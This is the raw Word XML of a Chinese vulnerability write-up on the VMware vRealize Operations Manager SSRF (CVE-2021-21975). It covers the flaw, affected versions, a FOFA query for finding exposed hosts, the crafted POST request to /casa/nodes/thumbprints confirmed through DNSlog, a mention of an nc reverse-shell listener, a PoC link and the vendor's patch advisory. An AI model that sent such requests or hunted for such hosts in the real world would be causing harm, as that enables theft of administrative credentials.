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center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Microsoft YaHei UI" w:hAnsi="Microsoft YaHei UI" w:eastAsia="Microsoft YaHei UI" w:cs="Microsoft YaHei UI"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Microsoft YaHei UI" w:hAnsi="Microsoft YaHei UI" w:eastAsia="Microsoft YaHei UI" w:cs="Microsoft YaHei UI"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>VMware vRealize Operations Manager SSRF漏洞 CVE-2021-21975</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>漏洞描述</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Helvetica" w:hAnsi="Helvetica" w:eastAsia="Helvetica" w:cs="Helvetica"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Helvetica" w:hAnsi="Helvetica" w:eastAsia="Helvetica" w:cs="Helvetica"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>2021年3月31日，VMWare官方发布了VMSA-2021-0004的风险通告，漏洞编号为CVE-2021-21975，CVE-2021-21983。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Helvetica" w:hAnsi="Helvetica" w:eastAsia="Helvetica" w:cs="Helvetica"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Helvetica" w:hAnsi="Helvetica" w:eastAsia="Helvetica" w:cs="Helvetica"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Helvetica" w:hAnsi="Helvetica" w:eastAsia="Helvetica" w:cs="Helvetica"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>CVE-2021-21975：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:eastAsia="Helvetica" w:cs="Helvetica"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>vRealize Operations Manager API包含服务器端请求伪造。可以通过网络访问vRealize Operations Manager API的恶意攻击者可以执行服务器端请求伪造攻击(SSRF)，以窃取管理凭据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Helvetica" w:hAnsi="Helvetica" w:eastAsia="Helvetica" w:cs="Helvetica"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Helvetica" w:hAnsi="Helvetica" w:eastAsia="Helvetica" w:cs="Helvetica"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Helvetica" w:hAnsi="Helvetica" w:eastAsia="Helvetica" w:cs="Helvetica"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Helvetica" w:hAnsi="Helvetica" w:eastAsia="Helvetica" w:cs="Helvetica"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>CVE-2021-21983：通过网络访问vRealize Operations Manager API的经过身份验证的恶意行为者可以将文件写入操作系统上的任意位置。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Microsoft YaHei UI" w:hAnsi="Microsoft YaHei UI" w:eastAsia="Microsoft YaHei UI" w:cs="Microsoft YaHei UI"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>版本影响</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Helvetica" w:hAnsi="Helvetica" w:eastAsia="Helvetica" w:cs="Helvetica"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Helvetica" w:hAnsi="Helvetica" w:eastAsia="Helvetica" w:cs="Helvetica"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>VMware vRealize Operations 8.3.0、8.2.0、8.1.1、8.1.0、7.5.0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Helvetica" w:hAnsi="Helvetica" w:eastAsia="Helvetica" w:cs="Helvetica"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Helvetica" w:hAnsi="Helvetica" w:eastAsia="Helvetica" w:cs="Helvetica"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>VMware Cloud Foundation  4.x、3.x</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Helvetica" w:hAnsi="Helvetica" w:eastAsia="Helvetica" w:cs="Helvetica"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Helvetica" w:hAnsi="Helvetica" w:eastAsia="Helvetica" w:cs="Helvetica"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>vRealize Suite Lifecycle Manager 8.x</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Helvetica" w:hAnsi="Helvetica" w:eastAsia="Helvetica" w:cs="Helvetica"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>漏洞利用</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsia="Microsoft YaHei UI"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="Microsoft YaHei UI"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>fofa语句</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>country="JP" &amp;&amp; title="vRealize Operations Manager"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266690" cy="256794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567940"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p/>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>登录界面如下</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266690" cy="25838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58381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通过DNSlog验证</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5267325" cy="1484630"/>
            <wp:effectExtent l="0" t="0" r="5715" b="889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6"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5267325" cy="1484630"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>构造数据包发送</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>POST /casa/nodes/thumbprints HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Host: xxx.xxx.xxx.xxx</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Content-Type: application/json;charset=UTF-8</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Content-Length: 24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["你获取的DNSlog子域"]</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266055" cy="2357755"/>
            <wp:effectExtent l="0" t="0" r="6985"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66055" cy="2357755"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>DNSlog刷新记录</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266690" cy="2740660"/>
            <wp:effectExtent l="0" t="0" r="6350"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6690" cy="274066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或者NC监听反弹shell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5267960" cy="1900555"/>
            <wp:effectExtent l="0" t="0" r="508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7960" cy="19005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发送构造的数据包</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5274310" cy="2667000"/>
            <wp:effectExtent l="0" t="0" r="1397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5274310" cy="2667000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5268595" cy="2108835"/>
            <wp:effectExtent l="0" t="0" r="4445"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268595" cy="2108835"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>利用POC</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>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"https://github.com/Henry4E36/VMWare-vRealize-SSRF" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="11"/>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>https://github.com/Henry4E36/VMWare-vRealize-SSRF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安全建议</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1、官方已提供固件补丁包，可以访问以下连接下载</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "https://www.vmware.com/security/advisories/VMSA-2021-0004.html" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="11"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>https://www.vmware.com/security/advisories/VMSA-2021-0004.html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273040" cy="157226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1572260"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p/>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66ED8"/>
    <w:rsid w:val="076A3E64"/>
    <w:rsid w:val="07EC2663"/>
    <w:rsid w:val="0EB13634"/>
    <w:rsid w:val="10C96086"/>
    <w:rsid w:val="15DC4944"/>
    <w:rsid w:val="18827B93"/>
    <w:rsid w:val="1A5F61AE"/>
    <w:rsid w:val="1DEA25DD"/>
    <w:rsid w:val="1E201DC5"/>
    <w:rsid w:val="31753F66"/>
    <w:rsid w:val="323A1215"/>
    <w:rsid w:val="3A545251"/>
    <w:rsid w:val="41F42C76"/>
    <w:rsid w:val="42F44816"/>
    <w:rsid w:val="47D97EC9"/>
    <w:rsid w:val="481F640F"/>
    <w:rsid w:val="490060D4"/>
    <w:rsid w:val="4A3016D9"/>
    <w:rsid w:val="4B6A0394"/>
    <w:rsid w:val="4E70630C"/>
    <w:rsid w:val="4F224C95"/>
    <w:rsid w:val="51113CDB"/>
    <w:rsid w:val="531C2679"/>
    <w:rsid w:val="567F23ED"/>
    <w:rsid w:val="5D757EEF"/>
    <w:rsid w:val="5FA570BE"/>
    <w:rsid w:val="62D6522D"/>
    <w:rsid w:val="65E458A3"/>
    <w:rsid w:val="66755802"/>
    <w:rsid w:val="6F1349A1"/>
    <w:rsid w:val="758C36E1"/>
    <w:rsid w:val="763E727D"/>
    <w:rsid w:val="76403DA0"/>
    <w:rsid w:val="774B4098"/>
    <w:rsid w:val="78783B29"/>
    <w:rsid w:val="7ABB224B"/>
    <w:rsid w:val="7CEF46E1"/>
    <w:rsid w:val="7F97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2021-04-02T01:52:00Z</dcterms:created>
  <dc:creator>wll</dc:creator>
  <cp:lastModifiedBy>wll</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-04-02T08:12:28Z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